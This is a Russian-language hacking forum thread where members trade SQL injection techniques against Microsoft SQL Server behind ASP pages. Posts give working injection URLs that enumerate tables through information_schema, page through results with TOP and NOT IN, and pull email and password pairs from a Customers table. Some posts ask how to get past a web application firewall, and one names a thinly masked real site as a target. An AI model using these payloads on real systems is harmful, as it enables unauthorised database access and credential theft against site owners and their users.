Авторские статьи Провидение Иньекций в MSSQL сервер от Microsoft.

Discussion in 'Статьи' started by guest3297, 3 Jan 2007.

  1. hookman

    hookman Member

    Joined:
    16 Feb 2009
    Messages:
    44
    Likes Received:
    10
    Reputations:
    0
    А если кодировать в хекс не только название таблицы а весь подзапрос:
    Code:
    http://site.com/resguides/Resguide.asp?ID=1+or+1=0x2873656C6563742B746F702B312B50617373776F72642B66726F6D2B5247417574686F7220286368696C64207461626C652929
    Ответ:
    Code:
    ADODB.Field error '800a0bcd'
    
    Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
    
    /resguides/Resguide.asp, line 16 
    Эт чё выходит что табла пустая?
     
  2. Raul Duke

    Raul Duke New Member

    Joined:
    20 Jan 2009
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Привет Всем.
    Столкнулся с такой проблемой:
    При запросе
    Выдает
    т.е. тут все норм

    далее
    ответ
    почему это происходит и как это обойти?
     
  3. Raul Duke

    Raul Duke New Member

    Joined:
    20 Jan 2009
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Вот, наслучай если у кого то такая же хрень будет
    PS Сенкс, Pin4eG
     
  4. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    Как листать записи в mssql?

    делаю при помощи top - выдает одинаковые результаты.

    вот к примеру.

    site/script?id=-7+union+select+top+1+1,2,3,table_schema%2bchar(0x3a)%2btable_name+4,5+from+information_schema.columns--

    при подстановке после top разных значений, не меняется вывод.
     
  5. bons

    bons Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    286
    Likes Received:
    121
    Reputations:
    21
    TOP обозначает количество первых записей в результирующей таблице.
    юзай NOT IN. Будет что-то вроде
    Code:
    site/script?id=-7 union select top 1 ... from information_schema.columns WHERE table_name NOT IN (SELECT TOP n table_name FROM information_schema)--
    где n - номер записи
     
    #85 bons, 27 Jul 2009
    Last edited: 27 Jul 2009
  6. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    Спасибо.

    Чот не работает так.

    делаю по такой схеме.

    PHP:
    SELECT top 20 FROM [some_table]

     
    WHERE [primary_key_fieldNOT IN

     
    (

     
    SELECT top 10 [primary_key_field]

    FROM [some_table]

    ORDER BY [primary_key_field]

     )

     
    ORDER BY [primary_key_field]

    site/script?id=-7+union+select+top+1+1,2,3,table_name+4,5+from+information_schema.columns+where+table_name+NOT+IN+(SELECT+TOP+5+table_name+FROM+information_schema.columns+ORDER+BY+table_name)+ORDER+BY+table_name--



    PS. Аа.. primary_key - это же id записи вроде как? Но в information_schema.columns нет primary_key ведь. Как быть?
     
  7. shellz[21h]

    shellz[21h] Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    311
    Likes Received:
    68
    Reputations:
    6
    классический метод.
    1 запрос:
    2 запрос:
    На первой странице ж написано.
     
    #87 shellz[21h], 27 Jul 2009
    Last edited: 27 Jul 2009
  8. shellz[21h]

    shellz[21h] Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    311
    Likes Received:
    68
    Reputations:
    6
    ?pid=443 or 1=(select top 1 table_name from information_schema.tables where table_name not in (SELECT TOP N table_name FROM information_schema.tables order by table_name))--
    где N - номер с 0 до .....
    Проверено работает.
     
  9. Sophos

    Sophos New Member

    Joined:
    6 Sep 2008
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    hi!

    Thanks for your tutorials and help here.
    I have a question, I searched a lot but I didn't find any explanations.

    So here's the problem:

    Code:
    www.somesite.com/.../asp?id=1 
    after I put " ' "

    Code:
    www.somesite.com/.../asp?id=1 '
    Code:
    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    
    [Microsoft][ODBC SQL Server Driver][SQL Server]Error converting data type varchar to numeric. 
    I have tried many ways, but whatever I do the same error appears :confused: .

    My question is how to inject this one. Simply, nothing worked, I've even chared the whole query.

    If anyone could help, I'll appreciate that a lot! I can send link, but only on PM.

    Spasiba ;)
     
  10. somemember

    somemember New Member

    Joined:
    30 Jan 2010
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Кто знает, как узнать корневой каталог веб-сайта с помощью Transact SQL ?
     
  11. BeerDrinker

    BeerDrinker New Member

    Joined:
    15 Mar 2008
    Messages:
    7
    Likes Received:
    4
    Reputations:
    0
    Подскажите пожалуйста как закоментировать конец строки.
    -- не помогает: "Characters found after end of SQL statement."
     
  12. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    а ето что за еррор ??

    vis.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--

     
  13. Welemir

    Welemir Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    229
    Likes Received:
    11
    Reputations:
    -4
    Кто знает,что за ошибка такая ? Диз похож на mssql:

    Provider error '80020005'

    Type mismatch.

    реакция на 1+or+1=1
     
  14. McFlow

    McFlow Member

    Joined:
    23 Jan 2009
    Messages:
    1
    Likes Received:
    29
    Reputations:
    0
    Либо аутентификация, либо трансформирование данных . . .ну это имхо :)
     
  15. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    Какие ище есть методы с Выводом Данных?

    1+or+1=(SELECT+TOP+1+cast(EmailAd dress+as+nvarchar)%2B%27%3A%27%2Bcast(Password+as+ nvarchar)+from+Customers)--

    так уменя не идет
     
  16. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    вот это

    %27%3A%27%

    замени на

    char(58)
     
    1 person likes this.
  17. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    dotDefender Blocked Your Request

    Please contact the site administrator, and provide the following Reference ID:

    DCF2-8C56-108D-7E2D
     
    #97 Дирижабль, 6 Apr 2010
    Last edited: 18 Aug 2010
  18. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    стоит WAF http://www.applicure.com/

    пробуй как-то обойти, по-моему децл не та тема, тем более нет ссылки. Подход в случае защиты к каждой скуле индивидуальный
     
  19. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    В cлучаях если фильтруются оператор select и т.п, то узнать system_user(),db_name(), можно так
    ?id=user
    ?id=db_name()
     
  20. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,026
    Likes Received:
    311
    Reputations:
    86
    Короче вот опять мои любимые музейщики http://www.r*c*xpo.com/*xhibition_ov*rvi*w.php?id=157' (заменим * на e).
    Там пых походу. Пробывал подставить конструкции из первого поста, но всегда выводится такое красивое число на белом фоне, как 1.
    Есть советы какие, м.б. кто сталкивался?
     
    _________________________